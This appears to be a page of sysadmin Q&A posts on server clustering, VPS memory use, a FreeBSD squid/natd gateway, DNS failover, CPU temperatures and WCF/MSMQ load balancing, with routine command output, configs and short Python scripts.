    I work for a small ISP, and we host about 250 domains and all the stuff that goes along with that: DNS, mail, spam filtering, and backups. Currently, we have separate DNS servers (two of them) and mail servers (outgoing mail is actually on the secondary DNS server, but was previously on its own server). In the past, this was done as an insurance measure: the last thing we need is for some doofus (usually yours truly) to hose a server, taking out DNS and mail right along with it, or for spammers to jam our incoming SMTP server, preventing outgoing mail from being sent too. In the past, this was a problem, and our servers were set up the way they are now to combat it. However, clustering solutions like Sun's Cobalt RAQ (in days of olde) and Virtualmin appear to cater to an all-in-one approach, and then deal with failures through redundant servers. I have avoided this thus far, but we've been using Virtualmin on our web server for a while now, and I'd like to expand into using it for a high-availability cluster. Our networking partner has recently built a datacenter that has eliminated all of our other bugaboos like network, cooling, and power issues, so now the only thing left to go wrong is me hosing a server, which happened earlier this month. One of the bigger reasons we've avoided going this route is that our hardware requirements aren't particularly high: one server easily handles all the sites we host (most of them are flat sites). Also, load-balancing routers tend to be expensive and complicated. All that I'm really expecting to do is build a two-node cluster for redundancy, so that when I hose a server (however rare that might be), we're not out for 8-12 hours while I rebuild it. What I need to know is how to get started, and whether I'm really in a position to bother with this kind of thing at all.

  • Unusually high memory usage on a CentOS VPS with 512 guaranteed RAM

    - by Andrei Bârsan
    I'm working on a medium-sized web application written in PHP that's running on a VPS with 512 MB of RAM. The webapp hasn't been officially launched yet, so there isn't much traffic going on, just me and a few other people working on it. There is another slightly smaller webapp also hosted on this machine, among 4-5 other small static sites. We are running CentOS 5 32-bit and cPanel/WHM. This is the result of running ps aux and, as you can see, it's not using 100% of the RAM. However, on the hypanel overview it's always shown as using around 500 MB of RAM, just for running Apache, MySQL, and the lowest-memory-footprint versions of the mail server, FTP server etc.

        -bash-3.2# ps aux
        USER      PID %CPU %MEM    VSZ   RSS TTY   STAT START TIME COMMAND
        root        1  0.0  0.0   2156   664 ?     Ss   12:08 0:00 init [3]
        root     1123  0.0  0.0   2260   548 ?     S<s  12:08 0:00 /sbin/udevd -d
        root     1462  0.0  0.0   1812   568 ?     Ss   12:08 0:00 syslogd -m 0
        named    1496  0.0  0.0   3808   820 ?     Ss   12:08 0:00 nsd
        named    1497  0.0  0.0  10672   756 ?     S    12:08 0:00 nsd
        named    1499  0.0  0.0   3880   584 ?     S    12:08 0:00 nsd
        root     1514  0.0  0.1   7240  1064 ?     Ss   12:08 0:00 /usr/sbin/sshd
        root     1522  0.0  0.0   2832   832 ?     Ss   12:08 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
        root     1534  0.0  0.1   3712  1328 ?     S    12:08 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql -
        mysql    1667  0.0  2.9 225680 30884 ?     Sl   12:08 0:00 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql -
        mailnull 1766  0.0  0.1   9352  1100 ?     Ss   12:08 0:00 /usr/sbin/exim -bd -q60m
        root     1797  0.0  0.0   2156   708 ?     Ss   12:08 0:00 /usr/sbin/dovecot
        root     1798  0.0  0.0   2632  1012 ?     S    12:08 0:00 dovecot-auth
        root     1816  0.0  3.0  38580 32456 ?     Ss   12:08 0:01 /usr/local/bin/spamd -d --allowed-ips=127.0.0.1 --pidfi
        root     1839  0.0  1.6  63200 17496 ?     Ss   12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        root     1846  0.0  0.1   5416  1468 ?     Ss   12:08 0:00 pure-ftpd (SERVER)
        root     1848  0.0  0.1   6212  1244 ?     S    12:08 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin
        root     1856  0.0  0.1   4492  1112 ?     Ss   12:08 0:00 crond
        root     1864  0.0  0.0   2356   428 ?     Ss   12:08 0:00 /usr/sbin/atd
        dovecot  1927  0.0  0.1   5196  1952 ?     S    12:08 0:00 pop3-login
        dovecot  1928  0.0  0.1   5196  1948 ?     S    12:08 0:00 pop3-login
        dovecot  1929  0.0  0.1   5316  2012 ?     S    12:08 0:00 imap-login
        dovecot  1930  0.0  0.2   5416  2228 ?     S    12:08 0:00 imap-login
        root     1939  0.0  0.1   3936  1964 ?     S    12:08 0:00 cPhulkd - processor
        root     1963  0.0  0.8  15876  8564 ?     S    12:08 0:00 cpsrvd (SSL) - waiting for connections
        root     1966  0.0  0.7  15172  7748 ?     S    12:08 0:00 cpdavd - accepting connections on 2077 and 2078
        root     1990  0.0  0.2   5008  3136 ?     S    12:08 0:00 queueprocd - wait to process a task
        root     2017  0.0  2.9  38580 31020 ?     S    12:08 0:00 spamd child
        root     2018  0.0  0.5   8904  5636 ?     S    12:08 0:00 /usr/bin/perl /usr/local/cpanel/bin/leechprotect
        nobody   2021  0.0  3.2  66512 33724 ?     S    12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   2022  0.0  3.1  67812 33024 ?     S    12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   2024  0.0  1.9  64364 20680 ?     S    12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        root     2027  0.0  0.4   9000  4540 ?     S    12:08 0:00 tailwatchd
        root     2032  0.0  0.1   4176  1836 ?     SN   12:08 0:00 cpanellogd - sleeping for logs
        nobody   3096  0.0  1.9  64572 20264 ?     S    12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   3097  0.0  2.8  66008 30136 ?     S    12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   3098  0.0  2.8  65704 29752 ?     S    12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   3099  0.0  3.1  67260 32816 ?     S    12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        andrei   3448  0.0  0.1   3204  1632 ?     S    12:50 0:00 imap
        nobody   3537  0.0  1.9  64308 20108 ?     S    13:01 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   3614  0.0  1.9  64576 20628 ?     S    13:10 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        nobody   3615  0.0  1.3  63200 14672 ?     S    13:10 0:00 /usr/local/apache/bin/httpd -k start -DSSL
        root     3626  0.0  0.2  10232  2964 ?     Rs   13:14 0:00 sshd: root@pts/0
        root     3648  0.0  0.1   3844  1600 pts/0 Ss   13:14 0:00 -bash
        root     3826  0.0  0.0   2532   908 pts/0 R+   13:21 0:00 ps aux

    Lately, without any significant changes to the configuration, the memory usage started peaking and going over 512 MB, causing the virtual server to kill Apache, basically murdering our site in the process. Do you have any idea whether this is normal and whether more resources should be acquired? I wouldn't have thought so, since there isn't much data or traffic online yet.
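
    As a cross-check against the panel's figure, the resident memory actually held by the processes above can be summed straight from ps. VPS panels, particularly on OpenVZ-style containers, often report allocated virtual memory or beancounter values rather than RSS, which would explain the gap. A quick sketch:

        import subprocess

        # Sum resident set size (RSS, in KiB) over every visible process.
        out = subprocess.run(["ps", "-eo", "rss="],
                             capture_output=True, text=True).stdout
        total_kib = sum(int(field) for field in out.split())
        print(f"total RSS: {total_kib / 1024:.0f} MiB")

    On OpenVZ, comparing privvmpages against physpages in /proc/user_beancounters (if that file exists on the VPS) would confirm which number the panel is reporting.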

  • FreeBSD high load loopback interface

    - by user1740915
    I have a problem with a FreeBSD server: FreeBSD 9.0 amd64, two network cards, em1 (internet) and em0 (local network), with ipfw, natd and squid (not transparent) configured; the server acts as a gateway for access to the Internet. The problem: upload speed through squid is very low. At the moment I see the following: natd and dhcpd load the CPU whenever something is uploading through squid, and there is a lot of traffic through the loopback interface. ipfw show output:

        00100 655389684 36707144666 allow ip from any to any via lo0
        00200 0 0 deny ip from any to 127.0.0.0/8
        00300 0 0 deny ip from 127.0.0.0/8 to any
        00400 0 0 deny ip from any to ::1
        00500 0 0 deny ip from ::1 to any
        00600 4 292 allow ipv6-icmp from :: to ff02::/16
        00700 0 0 allow ipv6-icmp from fe80::/10 to fe80::/10
        00800 1 76 allow ipv6-icmp from fe80::/10 to ff02::/16
        00900 0 0 allow ipv6-icmp from any to any ip6 icmp6types 1
        01000 0 0 allow ipv6-icmp from any to any ip6 icmp6types 2,135,136
        01100 1615 76160 deny ip from 192.168.1.1 to any in via em1
        01200 0 0 deny ip from 199.69.99.11 to any in via em0
        01300 46652 3705426 deny ip from any to 172.16.0.0/12 via em1
        01400 3936404 345618870 deny ip from any to 192.168.0.0/16 via em1
        01500 4 336 deny ip from any to 0.0.0.0/8 via em1
        01600 4129 387621 deny ip from any to 169.254.0.0/16 via em1
        01700 0 0 deny ip from any to 192.0.2.0/24 via em1
        01800 917566 33777571 deny ip from any to 224.0.0.0/4 via em1
        01900 147872 22029252 deny ip from any to 240.0.0.0/4 via em1
        02000 1132194739 1190981955947 divert 8668 ip4 from any to any via em1
        02100 3 248 deny ip from 172.16.0.0/12 to any via em1
        02200 35925 2281289 deny ip from 192.168.0.0/16 to any via em1
        02300 1808 122494 deny ip from 0.0.0.0/8 to any via em1
        02400 3 174 deny ip from 169.254.0.0/16 to any via em1
        02500 0 0 deny ip from 192.0.2.0/24 to any via em1
        02600 0 0 deny ip from 224.0.0.0/4 to any via em1
        02700 0 0 deny ip from 240.0.0.0/4 to any via em1
        02800 960156249 1095316736582 allow tcp from any to any established
        02900 64236062 8243196577 allow ip from any to any frag
        03000 34 1756 allow tcp from any to me dst-port 25 setup
        03100 193 11580 allow tcp from any to me dst-port 53 setup
        03200 63 4222 allow udp from any to me dst-port 53
        03300 64 8350 allow udp from me 53 to any
        03400 417 24140 allow tcp from any to me dst-port 80 setup
        03500 211 10472 allow ip from any to me dst-port 3389 setup
        05300 77 4488 allow ip from any to me dst-port 1723 setup
        05400 3 156 allow ip from any to me dst-port 8443 setup
        05500 9882 590596 allow tcp from any to me dst-port 22 setup
        05600 1 60 allow ip from any to me dst-port 2000 setup
        05700 0 0 allow ip from any to me dst-port 2201 setup
        07400 4241779 216690096 deny log logamount 1000 ip4 from any to any in via em1 setup proto tcp
        07500 21135656 1048824936 allow tcp from any to any setup
        07600 474447 35298081 allow udp from me to any dst-port 53 keep-state
        07700 532 40612 allow udp from me to any dst-port 123 keep-state
        65535 1990638432 1122305322718 allow ip from any to any

    systat -ifstat when uploading via squid:

        Interface      Traffic        Peak           Total
        tun0    in     79.507 KB/s    232.479 KB/s   42.314 GB
                out    2.022 MB/s     2.424 MB/s     59.662 GB
        lo0     in     4.450 MB/s     4.450 MB/s     43.723 GB
                out    4.450 MB/s     4.450 MB/s     43.723 GB
        em1     in     2.629 MB/s     2.982 MB/s     464.533 GB
                out    2.493 MB/s     2.875 MB/s     484.673 GB
        em0     in     240.458 KB/s   296.941 KB/s   442.368 GB
                out    512.508 KB/s   850.857 KB/s   416.122 GB

    top output:

        PID   USERNAME THR PRI NICE  SIZE    RES    STATE  C  TIME    WCPU   COMMAND
        66885 root       1  92    0  26672K  2784K  CPU3   3  528:43  65.48% natd
        9160  dhcpd      1  45    0  31032K  9280K  CPU1   1  7:40    32.96% dhcpd
        66455 root       1  20    0  18344K  2856K  select 1  119:27  1.37%  openvpn
        16043 squid      1  20    0  44404K  17884K kqread 2  0:22    0.29%  squid

    cat /usr/local/etc/squid/squid.conf:

        # Recommended minimum configuration:
        acl manager proto cache_object
        acl localhost src 127.0.0.1/32 ::1
        acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1

        # Example rule allowing access from your local networks.
        # Adapt to list your (internal) IP networks from where browsing
        # should be allowed
        acl localnet src 10.0.0.0/8     # RFC1918 possible internal network
        acl localnet src 172.16.0.0/12  # RFC1918 possible internal network
        acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
        acl localnet src fc00::/7       # RFC 4193 local private network range
        acl localnet src fe80::/10      # RFC 4291 link-local (directly plugged) machines

        acl SSL_ports port 443
        acl Safe_ports port 80          # http
        acl Safe_ports port 21          # ftp
        acl Safe_ports port 443         # https
        acl Safe_ports port 70          # gopher
        acl Safe_ports port 210         # wais
        acl Safe_ports port 1025-65535  # unregistered ports
        acl Safe_ports port 280         # http-mgmt
        acl Safe_ports port 488         # gss-http
        acl Safe_ports port 591         # filemaker
        acl Safe_ports port 777         # multiling http
        acl CONNECT method CONNECT

        # Recommended minimum Access Permission configuration:
        # Only allow cachemgr access from localhost
        http_access allow manager localhost
        http_access deny manager

        # Deny requests to certain unsafe ports
        http_access deny !Safe_ports

        # Deny CONNECT to other than secure SSL ports
        http_access deny CONNECT !SSL_ports

        # We strongly recommend the following be uncommented to protect innocent
        # web applications running on the proxy server who think the only
        # one who can access services on "localhost" is a local user
        http_access deny to_localhost

        # INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS

        # Example rule allowing access from your local networks.
        # Adapt localnet in the ACL section to list your (internal) IP networks
        # from where browsing should be allowed
        http_access allow localnet
        http_access allow localhost

        # And finally deny all other access to this proxy
        http_access deny all

        # Squid normally listens to port 3128
        http_port 192.168.1.1:3128

        # Uncomment and adjust the following to add a disk cache directory.
        #cache_dir ufs /var/squid/cache 100 16 256

        # Leave coredumps in the first cache dir
        coredump_dir /var/squid/cache

    I understand that the traffic passes through squid several times, but I cannot find out why.

  • DNS failover in a two datacenter scenario

    - by wanson
    I'm trying to implement a low-cost solution for website high availability, and I'm looking for the downsides of the following scenario. I have two servers with the same configuration, content, and MySQL replication (dual-master). They are in different datacenters; let's call them serverA and serverB. Users use serverA; serverB is more like a backup. Now I want to use DNS failover to switch users from serverA to serverB when serverA goes down. My idea is that I set up DNS servers (BIND/PowerDNS) on serverA and serverB, let's call them ns1.website.com and ns2.website.com (assuming I own website.com), then configure my domain to use them as its nameservers. Both DNS servers will return serverA's IP as my website's IP. If serverA goes down, I can (either manually or automatically from serverB) change the configuration of serverB's DNS to return serverB's IP as the website's IP. Of course the TTL will be low, as it's supposed to be in DNS failover. I know that it may take some time to switch to serverB (DNS TTL, time to detect serverA's failure, serverB DNS reconfiguration etc.), and that some small part of users won't use serverB anyway, and I'm OK with that. But what are the other downsides of such an approach?

    An alternative scenario is that ns1.website.com will return serverA's IP as the website's IP, and ns2.website.com will return serverB's IP. But AFAIK clients do not always use the primary nameserver and sometimes use the secondary one, so some small part of users would use serverB instead of serverA, which is not quite what I'd like. Can you confirm that DNS clients behave like that, and can you tell what percentage of clients would (statistically) use serverB instead of serverA? This approach also has the downside that when serverA comes back up, it will automatically be used as the website's primary server again, which is also a bad situation (cold cache, MySQL replication could fail in the meantime etc.), so I'm adding it only as a theoretical alternative.

    I was thinking about using professional DNS failover companies, but they charge by the number of DNS requests and the fees are very high (why?).
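
    To make the manual-or-automatic switch concrete, here is a rough sketch of the automatic variant running on serverB: probe serverA and, after a few consecutive failures, rewrite the zone to answer with serverB's address, then reload the nameserver. The addresses, the zone path and the BIND-style reload are all assumptions, and a real version must also increment the SOA serial:

        import socket
        import subprocess
        import time

        SERVER_A = "198.51.100.10"            # hypothetical serverA address
        SERVER_B = "203.0.113.10"             # hypothetical serverB address
        ZONE_FILE = "/etc/bind/db.website.com"

        def healthy(ip, port=80, timeout=3.0):
            try:
                with socket.create_connection((ip, port), timeout=timeout):
                    return True
            except OSError:
                return False

        failures = 0
        while True:
            failures = 0 if healthy(SERVER_A) else failures + 1
            if failures >= 3:                 # debounce transient blips
                with open(ZONE_FILE) as f:
                    zone = f.read()
                with open(ZONE_FILE, "w") as f:
                    f.write(zone.replace(SERVER_A, SERVER_B))
                # NB: bump the SOA serial here before reloading.
                subprocess.run(["rndc", "reload", "website.com"])
                break
            time.sleep(30)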

  • Max. Temp. on Intel Burn Test for Stock Dell Precision T3500

    - by HK1
    I'm troubleshooting an issue on a Dell Precision T3500. As part of my troubleshooting I've decided to try running a stress test using the Intel Burn Test software. This machine is a stock configuration with 12GB of RAM and a Xeon W3670 processor (nothing overclocked). When I run IBT using the standard mode, SpeedFan reports a processor temperature in excess of 80C. I've seen numbers as high as 90C, but even at that temperature the machine does not become unstable or crash. However, it seems way too high. This processor has a TCase of 67.9C according to Intel's website, so I'm guessing that means I'm in the danger zone any time I go over that temperature. I've checked the cooling system and everything looks fine. I've even taken the heat sink off and reinstalled it with new thermal compound, which did not appear to make the problem better or worse. Is there a discrepancy somewhere in the way temperatures are measured or displayed? I've also tried using HWMonitor from CPUID, and it reports the same temperatures. Should I just let the standard test run and disregard the temperature readings?

  • Difference between all servers in one cluster and more than one cluster with servers?

    - by silla
    I'm not sure I understand the difference, or how it works, when servers are running in one cluster versus when there is more than one cluster with servers in it, with regard to high availability and load balancing. To me they are somehow the same; there is not really a big difference. Let's make a simple example:

    1. 2 servers in 1 cluster
    2. 2 clusters with 1 server each

    1. If one server fails, the other one is able to continue the work. The same goes for load balancing: these two servers are able to balance the work between them.
    2. The same thing! If one server fails...

    The only thing that could be a problem with point 1 is if the cluster itself fails (then both of the servers are dead). But is this even possible? I was reading up on clustering and high availability, but I think I do not really get this. Probably I did not really understand how a cluster works. Are these two setups, 1 cluster and 2 clusters, somehow the same, or are there really some big differences? What should I know about it? Thank you

  • Load Balance WCF and Share a Remote MSMQ for High Throughput

    - by BarDev
    After a ton of reading in books and on the web, I have noticed hints that WCF and MSMQ can be used to achieve high throughput. The information I have seen mentions using multiple WCF services in a farm that reads from a single MSMQ queue. The problem is that I have found paragraphs here and there that mention that high throughput can be done, but I cannot seem to find a document on how to implement it. The following excerpt is from the MSDN article Best Practices for Queued Communication, http://msdn.microsoft.com/en-us/library/ms731093.aspx:

    "To achieve higher throughput and availability, use a farm of WCF services that read from the queue. This requires that all of these services expose the same contract on the same endpoint. The farm approach works best for applications that have high production rates of messages because it enables a number of services to all read from the same queue."

    This is what I'm trying to solve. I have an intranet application where a client sends a request to a WCF service, but I want the ability to load-balance the WCF services across multiple servers in a farm. I also want these WCF services in the farm to do transactional reads from a remote MSMQ when an item is available in the queue. If this is possible, one issue I have is that I do not understand the WCF activation process for retrieving messages from a remote queue. If this is possible, does anyone know of any articles or webcasts that explain it in detail? BarDev
